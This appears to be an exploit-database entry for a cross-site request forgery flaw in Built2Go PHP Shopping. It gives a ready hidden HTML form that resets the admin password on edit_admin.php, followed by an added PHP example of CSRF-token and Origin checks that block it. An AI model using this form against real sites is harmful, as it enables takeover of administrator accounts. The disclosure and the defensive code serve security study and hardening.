Exploit Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)

Exploiter

18 Dec 2022
EDB-ID
39013
EDB Verified
  1. Passed
Author
ATT4CKXT3RR0R1ST
Vulnerability type
WEBAPPS
Platform
PHP
CVE
N/A
Publication date
2014-01-08
Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)
HTML:
source: https://www.securityfocus.com/bid/64735/info

Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers. 

<form method="POST" name="form0" action="http://www.example.com/adminpanel/edit_admin.php">
<input type="hidden" name="userid" value="ADMIN"/>
<input type="hidden" name="pass" value="12121212"/>
<input type="hidden" name="retypepass" value="12121212"/>
<input type="hidden" name="addnew" value="1"/>
<input type="hidden" name="action" value="save"/>
<input type="hidden" name="new" value="Submit"/>
</form>
 
Source
www.exploit-db.com
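
The form above succeeds because the password-change request carries nothing an off-site page cannot supply. The following is an added example of a server-side guard for such a handler, not code from Built2Go or from the advisory: the field names `userid`, `pass` and `retypepass` come from the form on this page, while `csrf_token`, the function names and the `https://www.example.com` origin are assumptions.

```php
<?php
// Added example, not Built2Go code. Field names userid/pass/retypepass are
// taken from the form on this page; csrf_token and the function names are
// assumptions, and www.example.com stands in for the shop's own origin.
declare(strict_types=1);

// SameSite=Strict keeps the session cookie off cross-site POSTs (PHP >= 7.3).
session_set_cookie_params(['secure' => true, 'httponly' => true, 'samesite' => 'Strict']);
session_start();

// Per-session synchronizer token that the legitimate form embeds.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept only a string token equal to the session's, compared in constant time.
function csrf_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? null;
    $want = $session['csrf_token'] ?? null;
    return is_string($sent) && is_string($want) && $want !== ''
        && hash_equals($want, $sent);
}

// If the browser sent an Origin header, it must be the site's own origin.
function origin_ok(array $server, string $expected): bool
{
    return !isset($server['HTTP_ORIGIN']) || $server['HTTP_ORIGIN'] === $expected;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!origin_ok($_SERVER, 'https://www.example.com') || !csrf_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Forbidden: CSRF check failed');
    }
    // Token verified: the existing password-change logic would run here.
    exit('CSRF check passed');
}
?>
<form method="POST" action="edit_admin.php">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>"/>
  <input type="text" name="userid"/>
  <input type="password" name="pass"/>
  <input type="password" name="retypepass"/>
  <input type="submit" name="new" value="Submit"/>
</form>
```

A request built like the form on this page has no `csrf_token` field and is answered with 403. Requiring the current password on the same form is a further safeguard for password changes.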
